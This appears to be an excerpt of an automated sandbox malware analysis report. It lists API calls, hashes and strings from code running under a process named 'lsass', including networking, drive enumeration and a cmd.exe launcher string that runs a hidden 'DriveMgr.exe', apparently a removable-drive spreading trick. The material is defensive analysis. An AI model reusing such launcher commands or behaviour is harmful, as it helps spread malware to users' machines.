              • Instruction Fuzzy Hash: C80112B498020CEBCB60DF65DD4DAD9B7B4AB04704F10C0A9AA19A7240E6789FC9CFD4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memcmp.MSVCRT ref: 0077D088
              • memmove.MSVCRT ref: 0077D0C5
              • lstrlenA.KERNEL32(?,00000003,00000004,00000000,00000003,0000000D,00000000,00000000,?,?,?,00000001), ref: 0077D167
              • htons.WS2_32(?), ref: 0077D23A
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: htonslstrlenmemcmpmemmove
              • String ID:
              • API String ID: 302187628-0
              • Opcode ID: 6f46e8aef12e73a743a09ecf429305d98e0b3ce7ee4bf353296f80d7c9618a95
              • Instruction ID: a00e8158de93f0deef7c653072bc02341a003223c2b91cd14455fdd7c5633ef7
              • Opcode Fuzzy Hash: 6f46e8aef12e73a743a09ecf429305d98e0b3ce7ee4bf353296f80d7c9618a95
              • Instruction Fuzzy Hash: DC71AF70E0420ADBDF24DBA0DC95BBFB775BF44340F14C119E9196B2C2D678A946C790
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: memmove$memcmp
              • String ID: \
              • API String ID: 845337883-2967466578
              • Opcode ID: 74fcf3e4d10a9c81c09dcf7789ae585a115708f4be19fe9ccfb8603a070d1ead
              • Instruction ID: bdde50f82038142b3cf79abe4589115329fe01b217e180913a11fe42783b198e
              • Opcode Fuzzy Hash: 74fcf3e4d10a9c81c09dcf7789ae585a115708f4be19fe9ccfb8603a070d1ead
              • Instruction Fuzzy Hash: 1171B0B0D002689BDF24DB14CC95BEDBBB5AF54344F18C1E8E58CAA242DB388B958F54
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: lstrlen
              • String ID: net$net
              • API String ID: 1659193697-813024420
              • Opcode ID: 50ea9e4832ce221c3f15caca6877814d0b4b01e0db8e185b02af21b1241aeb64
              • Instruction ID: 8ffedcdbcc9bdde5292d58d9c49228c480b558620efb430d0ff0bfe5607333eb
              • Opcode Fuzzy Hash: 50ea9e4832ce221c3f15caca6877814d0b4b01e0db8e185b02af21b1241aeb64
              • Instruction Fuzzy Hash: 73316074A4420DAFDB18DBA4CC95FEDB7B9BB48304F248598E615E7280D6B89F84CB50
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetModuleFileNameW.KERNEL32(00000000,0078A128,00000208), ref: 00781015
                • Part of subcall function 007801E0: _wfopen.MSVCRT ref: 007801F6
                • Part of subcall function 007801E0: fseek.MSVCRT ref: 00780209
                • Part of subcall function 007801E0: ftell.MSVCRT ref: 00780215
                • Part of subcall function 007801E0: fclose.MSVCRT ref: 00780224
              • ExitThread.KERNEL32 ref: 00781117
                • Part of subcall function 00780870: GetLogicalDrives.KERNEL32 ref: 00780876
                • Part of subcall function 00780870: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 007808C4
                • Part of subcall function 00780870: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 007808F1
                • Part of subcall function 00780870: RegCloseKey.ADVAPI32(?), ref: 0078090E
              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 007810AE
              • Sleep.KERNEL32(000007D0), ref: 0078110A
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CloseDrivesExitFileInformationLogicalModuleNameOpenQuerySleepThreadValueVolume_wfopenfclosefseekftell
              • String ID:
              • API String ID: 3729102641-0
              • Opcode ID: 5123c78b750a0bca21e256604ca3225b032e366a63804574df3f0a0c7f6ddcb3
              • Instruction ID: f599bb7128374189c46e840df42c0ea54f4c1535f2c5830cbd7bf3d2668ad6d3
              • Opcode Fuzzy Hash: 5123c78b750a0bca21e256604ca3225b032e366a63804574df3f0a0c7f6ddcb3
              • Instruction Fuzzy Hash: 4D31C5B1D80208FBDB14EBE0DC4EFEE7778AF04701F608059E206A6180D6789684CFA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00777020: getaddrinfo.WS2_32(00000000,?,00000001,00000006), ref: 0077705F
              • socket.WS2_32(?,?,?), ref: 00774A1E
              • connect.WS2_32(000000FF,?,?), ref: 00774A48
              • freeaddrinfo.WS2_32(?), ref: 00774AA5
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: connectfreeaddrinfogetaddrinfosocket
              • String ID:
              • API String ID: 952663764-0
              • Opcode ID: 39a6e0b9dabe6283139b557e218e83bc4e127a8fdfb39c90ce448dbf0904c675
              • Instruction ID: bef2f79345229b66bba460f9858581d2f7e8780c4427cdc6c16a02ed2648792e
              • Opcode Fuzzy Hash: 39a6e0b9dabe6283139b557e218e83bc4e127a8fdfb39c90ce448dbf0904c675
              • Instruction Fuzzy Hash: 013162B9A04209EFCB04CF94C944DAEB7B5BF48340F25C689E9199B381C735DE41DB94
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNEL32(00000001,C0000000,?,00000000,00000000,?,00000000,?,00000002,00000001,00000080), ref: 00781153
              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 0078116C
              • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00781198
              • CloseHandle.KERNEL32(000000FF), ref: 007811CD
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: 8db4231ae2af6b1561c0e00d7c6afaf2cc514ae9b6c452e41174eb294a4d05bb
              • Instruction ID: 6332e6173f173249797b17826c90f14e1379858fd092aaaf6efab391c5289c30
              • Opcode Fuzzy Hash: 8db4231ae2af6b1561c0e00d7c6afaf2cc514ae9b6c452e41174eb294a4d05bb
              • Instruction Fuzzy Hash: 7A210B75E4020CFFDB14DFA8CD99FDEBB79AF48300F208588E615A7280D674AA41CB94
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: _wfopenfclosefseekftell
              • String ID:
              • API String ID: 3257356417-0
              • Opcode ID: 0817f54fe16e63bb847e5ffc06dcec61cddb5f2a9d71a3975b65c3f69b670872
              • Instruction ID: 6ab6851bb41a7fcda3dbed6d94fc62a030ef5b51bf1e1460daf274c26030b7bd
              • Opcode Fuzzy Hash: 0817f54fe16e63bb847e5ffc06dcec61cddb5f2a9d71a3975b65c3f69b670872
              • Instruction Fuzzy Hash: 76F01CF5D44208FBDB00FBA49D46B5D7778AB44700F1041A4F9046B241E579AF149791
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • closesocket.WS2_32(00000000), ref: 00778FE7
              • WaitForSingleObject.KERNEL32(00000000,00001388,00000000,?,0077E987,00000000,00000000,00000000), ref: 00778FF9
              • TerminateThread.KERNEL32(00000000,00000000,?,0077E987,00000000,00000000,00000000), ref: 00779008
              • CloseHandle.KERNEL32(00000000,?,0077E987,00000000,00000000,00000000), ref: 00779014
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CloseHandleObjectSingleTerminateThreadWaitclosesocket
              • String ID:
              • API String ID: 1562794747-0
              • Opcode ID: 565bd6f46162daa77f9343f660bc78b1bc4e65616ab96cb814c95c98d8854d7a
              • Instruction ID: 6cf0a09ffa2c3c216b9321f142ef0400be7702105fcbd4211b6eabae769b113d
              • Opcode Fuzzy Hash: 565bd6f46162daa77f9343f660bc78b1bc4e65616ab96cb814c95c98d8854d7a
              • Instruction Fuzzy Hash: AAF030765C4304ABCB00DBA8EC0CF293F6CA705315F28C244F7058A2A0DABD98058799
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CoCreateInstance.OLE32(007877A4,00000000,00000017,00787784,00000008,shell32.dll,00000008), ref: 00780948
              Strings
              • %windir%\system32\cmd.exe, xrefs: 00780956
              • /c start __ & __\DriveMgr.exe & exit, xrefs: 0078098F
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CreateInstance
              • String ID: %windir%\system32\cmd.exe$/c start __ & __\DriveMgr.exe & exit
              • API String ID: 542301482-2643104863
              • Opcode ID: a6ca5b0e81fd0f59f3f249c7b70edff668cccb9b0788750ccd89da1c28cce627
              • Instruction ID: baf3b2994ce37962f121a96e8a7d576fff860a4148f13d6c0bccd150d8f4dfac
              • Opcode Fuzzy Hash: a6ca5b0e81fd0f59f3f249c7b70edff668cccb9b0788750ccd89da1c28cce627
              • Instruction Fuzzy Hash: 8D21B779740509EFC708EF98D991D9EB3B9AF8C700F204198E6059B3A5DA71FE41DB90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • setsockopt.WS2_32(Xw,0000FFFF,00000080,00000001,00000004), ref: 00777223
              • closesocket.WS2_32 ref: 0077722F
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: closesocketsetsockopt
              • String ID: Xw
              • API String ID: 553142124-290828094
              • Opcode ID: f76633d5f022d34411ad77b58e2396344a049040afba964bd36ce9eba77dada2
              • Instruction ID: 809699f9a36b6f39011da029cea7c4da150fc697100f9f06dc9763c0d47f9077
              • Opcode Fuzzy Hash: f76633d5f022d34411ad77b58e2396344a049040afba964bd36ce9eba77dada2
              • Instruction Fuzzy Hash: 0AF0D474240209ABCB14DF94D841AA97779FF49760F2083A8FD688F3E0DB75AA45CB94
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetLastError.KERNEL32 ref: 00774264
              • GlobalFree.KERNEL32(00000000), ref: 007742FE
              • GlobalFree.KERNEL32(00000000), ref: 0077430E
              • GlobalFree.KERNEL32(00000000), ref: 0077431E
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: FreeGlobal$ErrorLast
              • String ID:
              • API String ID: 1236395209-0
              • Opcode ID: cd616975e9d79cea9d77d3627c4cc57c9ccf96b7640ac500f5c0b3f8860238b0
              • Instruction ID: 8334f44626a4cda3ef7f7cc6e544a7fbe8043845a9244a0b7d7accb6c9efd861
              • Opcode Fuzzy Hash: cd616975e9d79cea9d77d3627c4cc57c9ccf96b7640ac500f5c0b3f8860238b0
              • Instruction Fuzzy Hash: 73319E75984249EBDF10DBF4DC68BFE7BB46F20341F04C458F40896182DB788648CB61
              Uniqueness

              Uniqueness Score: -1.00%